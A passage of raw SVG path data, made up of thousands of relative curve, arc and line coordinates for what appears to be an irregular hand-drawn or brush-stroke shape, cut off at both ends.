1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.